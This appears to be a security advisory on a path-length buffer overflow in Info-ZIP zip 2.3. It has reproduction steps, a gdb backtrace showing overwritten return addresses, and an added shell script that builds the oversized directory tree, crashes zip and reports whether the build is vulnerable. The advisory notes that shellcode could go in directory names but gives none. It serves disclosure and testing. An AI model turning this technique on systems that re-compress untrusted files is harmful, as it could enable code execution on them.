Zip is a compression and file packaging/archive utility. It is highly compatible both with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS and with Info-ZIP's own UnZip, and it is installed by default with many Linux distributions.
A vulnerability in Zip allows an attacker to run arbitrary code by getting zip to recursively compress a specially crafted directory tree, for example one unpacked from an attacker-supplied archive.
* Zip version 2.3, shipped as the "zip" package with Debian Linux. Possibly all earlier Info-ZIP versions are vulnerable as well.
When zip performs recursive directory compression, it does not check the length of the resulting path. If the path is too long, a buffer overflow occurs, corrupting the stack and causing a segmentation fault. Because the overflowing bytes come from directory and file names, the vulnerability can be exploited by embedding shellcode in a directory or file name; the backtrace below shows the saved return addresses already overwritten with name bytes. The issue is not of primary concern for users who only zip their own files, but it can be critical for environments where untrusted content is re-compressed automatically with the Info-ZIP zip utility, since there the attacker chooses the directory names.
The issue can be reproduced by following these steps:
1. Create an 8-level directory structure, where each directory name is 256 characters long (we used 256 'a' characters).
2. Run "zip -r file.zip *" from the directory above the tree. The application crashes with "segmentation fault".
3. Run "gdb -core core `which zip`" (assuming core dumps are enabled, e.g. with "ulimit -c unlimited").
4. Type "where" and hit Enter. Here is what you will see (0x61616161 is "aaaa": the saved return addresses on the stack have been overwritten with bytes from the directory names):
Program terminated with signal 11, Segmentation fault.
#0 0x0805108e in error ()
#1 0x61616161 in ?? ()
#2 0x61616161 in ?? ()
#3 0x61616161 in ?? ()
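The following script automates the reproduction steps above and goes slightly beyond them: the depth and name length are parameters, a crash is detected from zip's exit status (128 + signal number, so 139 means SIGSEGV), and the backtrace is pulled from the core file with gdb in batch mode. It is an added example, not part of the original advisory or of Info-ZIP's code, and it assumes a POSIX sh with mkdir, zip and optionally gdb in PATH, and that the kernel's core_pattern writes a file named "core" into the working directory. One caveat the advisory does not mention: most Linux filesystems cap a single path component at NAME_MAX = 255 bytes, so mkdir refuses a 256-character name with "File name too long"; the script therefore defaults to 255, which still yields a relative path of over 2000 bytes (well under PATH_MAX = 4096, so the path itself is legal).

```shell
#!/bin/sh
# Added reproduction helper for the zip -r long-path crash. Not part of the
# original advisory. Assumes POSIX sh, mkdir, zip and optionally gdb in PATH.
set -u

# Build DEPTH nested directories below ROOT, each named with LEN copies of
# CHAR (default 'a'), and print the deepest directory created.
# Names longer than NAME_MAX (255 on most Linux filesystems) make mkdir fail,
# in which case the function returns 1.
build_tree() {
    root=$1
    depth=$2
    len=$3
    char=${4:-a}
    name=$(printf "%${len}s" "" | tr ' ' "$char")
    mkdir -p "$root" || return 1
    dir=$root
    i=0
    while [ "$i" -lt "$depth" ]; do
        dir="$dir/$name"
        mkdir "$dir" || return 1
        i=$((i + 1))
    done
    printf '%s\n' "$dir"
}

# Length of LEAF relative to ROOT, i.e. the path zip has to assemble while
# recursing from ROOT.
rel_path_len() {
    rel=${2#"$1/"}
    printf '%s\n' "${#rel}"
}

# Run "zip -r ARCHIVE *" inside TREEDIR and print the signal that killed zip
# (11 = SIGSEGV), or 0 if zip exited on its own. A core file is allowed so
# that backtrace() can inspect the crash.
run_zip() {
    treedir=$1
    archive=$2
    ulimit -c unlimited 2>/dev/null
    if ( cd "$treedir" && zip -qr "$archive" * ); then
        status=0
    else
        status=$?
    fi
    if [ "$status" -gt 128 ]; then
        printf '%s\n' "$((status - 128))"
    else
        printf '0\n'
    fi
}

# Print a backtrace from the core file written in TREEDIR, if any. On a
# vulnerable build the frames show 0x61616161 ("aaaa"): the saved return
# addresses were overwritten by the directory name.
backtrace() {
    treedir=$1
    if [ -f "$treedir/core" ] && command -v gdb >/dev/null 2>&1; then
        gdb -batch -ex bt "$(command -v zip)" "$treedir/core"
    else
        echo "no core file (check /proc/sys/kernel/core_pattern) or gdb not installed"
    fi
}

# Full reproduction: DEPTH levels (default 8) of LEN-byte names (default 255).
reproduce() {
    work=$(mktemp -d)
    if ! leaf=$(build_tree "$work/tree" "${1:-8}" "${2:-255}"); then
        echo "mkdir failed: keep the name length at or below NAME_MAX (255)"
        return 1
    fi
    echo "relative path length: $(rel_path_len "$work/tree" "$leaf")"
    sig=$(run_zip "$work/tree" "$work/out.zip")
    if [ "$sig" -ne 0 ]; then
        echo "zip was killed by signal $sig (11 = SIGSEGV): vulnerable build"
        backtrace "$work/tree"
    else
        echo "zip completed normally: this build handles the long path"
    fi
}

# Usage: sh repro.sh --run [depth] [name-length]
if [ "${1:-}" = "--run" ]; then
    shift
    reproduce "$@"
fi
```

Run it as "sh repro.sh --run" to use the advisory's eight levels, or "sh repro.sh --run 8 255" explicitly; a patched zip reports that it completed normally, while a vulnerable build reports the signal and prints the backtrace with the 0x61616161 frames shown above.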